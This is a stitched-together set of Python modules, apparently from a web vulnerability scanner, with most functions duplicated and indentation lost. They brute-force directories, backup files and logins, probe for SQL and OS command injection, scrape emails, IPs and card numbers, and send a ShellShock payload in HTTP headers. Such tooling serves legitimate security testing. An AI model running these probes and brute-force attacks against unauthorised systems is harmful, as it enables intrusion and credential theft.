def module_run(self):
test('Starting bruteforce...')
host = self.options['host']
port = self.options['port']
method = self.options['method']
wordlist = self.options['wordlist']
url_path = self.options['url_path']
url_ = check_url(check_end(host,url_path),port)
for line in readfile(self.check(wordlist)):
url = check_end(url_,line)
self.thread(url,method)
def module_run(self):
test('Scanning...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host,url_path),port)
for path in ['trace.axd','Trace.axd']:
url = check_end(url,path)
resp = self.request(url=url,method=method,data=data)
if resp.code == 200:
if re.search(r'<td><h1>Application Trace</h1></td>',resp.content,re.I):
plus('ASP.NET trace was found: %s'%(resp.url))
return
def module_run(self):
path = os.path.join(self.data_path,'os_command_injection.galileo')
test('Injecting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
headers = self.options['headers']
status = self.options['status']
url_path = self.options['url_path']
wordlist = self.options['wordlist'] if self.options['wordlist']!=('' or None) else path
url = check_url(check_end(host,url_path),port)
for payload in readfile(wordlist):
random_string = rand_all(20)
payload = payload.replace('[PAYLOAD]',random_string)
if method == 'GET':
urls = Replace(url,payload,data).run()
for url_ in urls:
print(url_)
resp = self.request(url=url_,method=method,data=data)
if re.search(random_string,resp.content,re.I):
plus('OS Command Vulnerability was found: %s'%(resp.url))
return
elif method == 'POST':
url_ = Replace(url,payload,data).run()[:1]
data_= Replace(url,payload,data).run()[1:]
for _url_ in url_:
for data in data_:
resp = self.request(url=_url_,method=method,data=data)
if re.search(random_string,resp.content,re.I):
plus('OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s'%(resp.url,data))
return
else:return
def module_run(self):
test('Scanning...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host, url_path), port)
for path in ['trace.axd', 'Trace.axd']:
url = check_end(url, path)
resp = self.request(url=url, method=method, data=data)
if resp.code == 200:
if re.search(r'<td><h1>Application Trace</h1></td>',
resp.content, re.I):
plus('ASP.NET trace was found: %s' % (resp.url))
return
def module_run(self):
path = os.path.join(self.data_path,'sql_injection.galileo')
test('Injecting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
wordlist = self.options['wordlist'] if self.options['wordlist']!=('' or None) else path
url = check_url(check_end(host,url_path),port)
for payload in readfile(wordlist):
if method == 'GET':
urls = Replace(url,payload,data).run()
for url_ in urls:
resp = self.request(url=url_,method=method,data=data)
name,error = sql_error(resp.content)
if name and error:
plus('SQL Injection was found: %s'%(resp.url))
print(' \_ DBMS => %s\n \_ ERROR => %s'%(name,error))
return
elif method == 'POST':
url_ = Replace(url,payload,data).run()[:1]
data_= Replace(url,payload,data).run()[1:]
for _url_ in url_:
for data in data_:
resp = self.request(url=_url_,method=method,data=data)
name,error = sql_error(resp.content)
if name and error:
plus('SQL Injection was found: %s'%(resp.url))
print(' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s'%(data,name,error))
return
else:
return
def module_run(self):
test('Starting bruteforce...')
back_ext = [
' (copy)/','_copy/', '- Copy/','~/','.7z',
'.gz','.tar.gz','.tar','.tar.7z','.tar.bz2','.bak',
'.old','.zip','.rar','.bac','_old','_bak','_backup','1','2','3'
]
host = self.options['host']
port = self.options['port']
method = self.options['method']
wordlist = self.options['wordlist']
url_path = self.options['url_path']
extensions = self.to_dict(self.options['exts']) if self.options['exts'] != None else back_ext
url_ = check_url(check_end(host,url_path),port)
for dir_ in readfile(self.check(wordlist)):
for bk in extensions:
url = check_end(url_,dir_+bk)
self.thread(url,method)
def module_run(self):
test('Detecting...')
host = self.options['host']
port = self.options['port']
url_path = self.options['url_path']
url = check_url(check_end(host,url_path),port)
for m in ['GET','HEAD','BLABLA','OPTIONS','DELETE']:
resp = self.request(url=url,method=m)
if 'server' in resp.headers.keys():
plus('Detect Server: %s'%(resp.headers['server']))
return
def module_run(self):
test('Starting bruteforce...')
host = self.options['host']
port = self.options['port']
method = self.options['method']
wpass = self.options['wpass']
wuser = self.options['wuser']
url_path = self.options['url_path']
url = check_url(check_end(host,url_path),port)
for user in readfile(self.check(wuser)):
for passwd in readfile(self.check(wpass)):
self.thread(url,method,user,passwd)
def module_run(self):
test('Starting bruteforce...')
host = self.options['host']
port = self.options['port']
method = self.options['method']
wpass = self.options['wpass']
wuser = self.options['wuser']
url_path = self.options['url_path']
url = check_url(check_end(host, url_path), port)
for user in readfile(self.check(wuser)):
for passwd in readfile(self.check(wpass)):
self.thread(url, method, user, passwd)
def module_run(self):
test('Detecting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host,url_path),port)
resp = self.request(url=url,method=method,data=data)
for cms in ['drupal','joomla','wordpress']:
funct = getattr(self,cms)
bool_ = funct(resp.headers,resp.content)
if bool_:
plus('Found %s cms'%(cms.title()))
return
def module_run(self):
test('Detecting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host, url_path), port)
resp = self.request(url=url, method=method, data=data)
for cms in ['drupal', 'joomla', 'wordpress']:
funct = getattr(self, cms)
bool_ = funct(resp.headers, resp.content)
if bool_:
plus('Found %s cms' % (cms.title()))
return
def module_run(self):
test('Searching...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
regexp = self.options['regexp']
url_path = self.options['url_path']
url = check_url(check_end(host,url_path),port)
resp = self.request(url=url,method=method,data=data)
bool_,lang = source_code(resp.code,resp.content)
if bool_ and lang:
plus2('Code disclosure vulnerability was found in: %s'%(resp.url))
if bool_ is False and lang is None:
return
def module_run(self):
test('Searching...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
regexp = self.options['regexp']
url_path = self.options['url_path']
url = check_url(check_end(host, url_path), port)
resp = self.request(url=url, method=method, data=data)
bool_, lang = source_code(resp.code, resp.content)
if bool_ and lang:
plus2('Code disclosure vulnerability was found in: %s' %
(resp.url))
if bool_ is False and lang is None:
return
def module_run(self):
test('Detecting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host, url_path), port)
resp = self.request(url=url)
frameworks = [
'mvc', 'cakephp', 'cherrypy', 'django', 'flask', 'fuelphp',
'larvel', 'grails', 'nette', 'rails', 'symfony'
]
for fm in frameworks:
funct = getattr(self, fm)
bool_ = funct(resp.headers, resp.content)
if bool_:
plus('Found %s Framework' % (funct.__doc__))
return
def module_run(self):
test('Detecting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host,url_path),port)
resp = self.request(url=url)
frameworks = [
'mvc','cakephp','cherrypy','django','flask',
'fuelphp','larvel','grails','nette','rails','symfony'
]
for fm in frameworks:
funct = getattr(self,fm)
bool_ = funct(resp.headers,resp.content)
if bool_:
plus('Found %s Framework'%(funct.__doc__))
return
def module_run(self):
path = os.path.join(self.data_path, 'os_command_injection.galileo')
test('Injecting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
headers = self.options['headers']
status = self.options['status']
url_path = self.options['url_path']
wordlist = self.options['wordlist'] if self.options['wordlist'] != (
'' or None) else path
url = check_url(check_end(host, url_path), port)
for payload in readfile(wordlist):
random_string = rand_all(20)
payload = payload.replace('[PAYLOAD]', random_string)
if method == 'GET':
urls = Replace(url, payload, data).run()
for url_ in urls:
print(url_)
resp = self.request(url=url_, method=method, data=data)
if re.search(random_string, resp.content, re.I):
plus('OS Command Vulnerability was found: %s' %
(resp.url))
return
elif method == 'POST':
url_ = Replace(url, payload, data).run()[:1]
data_ = Replace(url, payload, data).run()[1:]
for _url_ in url_:
for data in data_:
resp = self.request(url=_url_,
method=method,
data=data)
if re.search(random_string, resp.content, re.I):
plus(
'OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s'
% (resp.url, data))
return
else:
return
def module_run(self):
# https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
cc_regex = {
'American Express': r'^[34|37][0-9]{14}$',
'Mastercard':
r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$',
'Visa Card': r'^4[0-9]{12}(?:[0-9]{3})?$',
'Visa Master Card':
r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$'
}
test('Searching...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
regexp = self.options['regexp']
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host, url_path), port)
c = 0
resp = self.request(url=url, method=method, data=data)
try:
if regexp == ('' or None):
for item in cc_regex.items():
found_cc = re.findall(item[1], resp.content, re.I)
if found_cc:
c = 1
for xx in found_cc:
print('%s => %s' % (item[0], xx))
if c == 0: info('Not found credit cards...')
elif regexp != ('' or None):
found_cc = re.findall(regexp, resp.content, re.I)
if found_cc:
for xx in found_cc:
print('Found REGEX => %s' % (x))
else:
info('Not found credit cards...')
else:
return
except re.error as e:
warn(e.message)
def module_run(self):
path = os.path.join(self.data_path, 'sql_injection.galileo')
test('Injecting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
wordlist = self.options['wordlist'] if self.options['wordlist'] != (
'' or None) else path
url = check_url(check_end(host, url_path), port)
for payload in readfile(wordlist):
if method == 'GET':
urls = Replace(url, payload, data).run()
for url_ in urls:
resp = self.request(url=url_, method=method, data=data)
name, error = sql_error(resp.content)
if name and error:
plus('SQL Injection was found: %s' % (resp.url))
print(' \_ DBMS => %s\n \_ ERROR => %s' %
(name, error))
return
elif method == 'POST':
url_ = Replace(url, payload, data).run()[:1]
data_ = Replace(url, payload, data).run()[1:]
for _url_ in url_:
for data in data_:
resp = self.request(url=_url_,
method=method,
data=data)
name, error = sql_error(resp.content)
if name and error:
plus('SQL Injection was found: %s' % (resp.url))
print(
' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s'
% (data, name, error))
return
else:
return
def module_run(self):
# https://www.regular-expressions.info/email.html
regexp_ = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}'
test('Searching...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
regexp = self.options['regexp'] if self.options['regexp'] != (''or None) else regexp_
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host,url_path),port)
c = 0
resp = self.request(url=url,method=method,data=data)
try:
found_email = re.findall(regexp,resp.content,re.I)
if found_email:
c = 1
for email in found_email:
print('Email => %s'%(email))
if c == 0:info('Not found emails...')
except re.error as e:
warn(e.message)
def module_run(self):
# https://www.regular-expressions.info/ip.html
regexp_ = r'[0-9]+(?:\.[0-9]+){3}'
test('Searching...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
regexp = self.options['regexp'] if self.options['regexp'] != (''or None) else regexp_
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host,url_path),port)
c = 0
resp = self.request(url=url,method=method,data=data)
try:
found_ip = re.findall(regexp,resp.content,re.I)
if found_ip:
c = 1
for ip in found_ip:
print('Private IP => %s'%(ip))
if c == 0:info('Not found private ip...')
except re.error as e:
warn(e.message)
def module_run(self):
r_str = rand_str(30)
exploit = '() { :;}; echo; echo; echo %s'%(r_str)
test('Exploiting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
headers = {
'User-Agent' : exploit,
'Cookie' : exploit,
'Referer' : exploit
}
url = check_url(check_end(host,url_path),port)
# request
resp = self.request(url=url,method=method,data=data,headers=headers)
if resp.code == 200:
if re.search(r_str,resp.content,re.I):
plus('ShellShock was found in: %s'%(resp.url))
else:return
else:return
def module_run(self):
# https://www.regular-expressions.info/email.html
regexp_ = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}'
test('Searching...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
regexp = self.options['regexp'] if self.options['regexp'] != (
'' or None) else regexp_
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host, url_path), port)
c = 0
resp = self.request(url=url, method=method, data=data)
try:
found_email = re.findall(regexp, resp.content, re.I)
if found_email:
c = 1
for email in found_email:
print('Email => %s' % (email))
if c == 0: info('Not found emails...')
except re.error as e:
warn(e.message)
def module_run(self):
# https://www.regular-expressions.info/ip.html
regexp_ = r'[0-9]+(?:\.[0-9]+){3}'
test('Searching...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
regexp = self.options['regexp'] if self.options['regexp'] != (
'' or None) else regexp_
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host, url_path), port)
c = 0
resp = self.request(url=url, method=method, data=data)
try:
found_ip = re.findall(regexp, resp.content, re.I)
if found_ip:
c = 1
for ip in found_ip:
print('Private IP => %s' % (ip))
if c == 0: info('Not found private ip...')
except re.error as e:
warn(e.message)
def module_run(self):
# https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
cc_regex = {
'American Express' : r'^[34|37][0-9]{14}$',
'Mastercard' : r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$',
'Visa Card' : r'^4[0-9]{12}(?:[0-9]{3})?$',
'Visa Master Card' : r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$'
}
test('Searching...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
regexp = self.options['regexp']
method = self.options['method']
url_path = self.options['url_path']
url = check_url(check_end(host,url_path),port)
c = 0
resp = self.request(url=url,method=method,data=data)
try:
if regexp == ('' or None):
for item in cc_regex.items():
found_cc = re.findall(item[1],resp.content,re.I)
if found_cc:
c = 1
for xx in found_cc:
print('%s => %s'%(item[0],xx))
if c == 0:info('Not found credit cards...')
elif regexp != ('' or None):
found_cc = re.findall(regexp,resp.content,re.I)
if found_cc:
for xx in found_cc:
print('Found REGEX => %s'%(x))
else:info('Not found credit cards...')
else:
return
except re.error as e:
warn(e.message)
def module_run(self):
r_str = rand_str(30)
exploit = '() { :;}; echo; echo; echo %s' % (r_str)
test('Exploiting...')
host = self.options['host']
port = self.options['port']
data = self.options['data']
method = self.options['method']
url_path = self.options['url_path']
headers = {
'User-Agent': exploit,
'Cookie': exploit,
'Referer': exploit
}
url = check_url(check_end(host, url_path), port)
# request
resp = self.request(url=url, method=method, data=data, headers=headers)
if resp.code == 200:
if re.search(r_str, resp.content, re.I):
plus('ShellShock was found in: %s' % (resp.url))
else:
return
else:
return
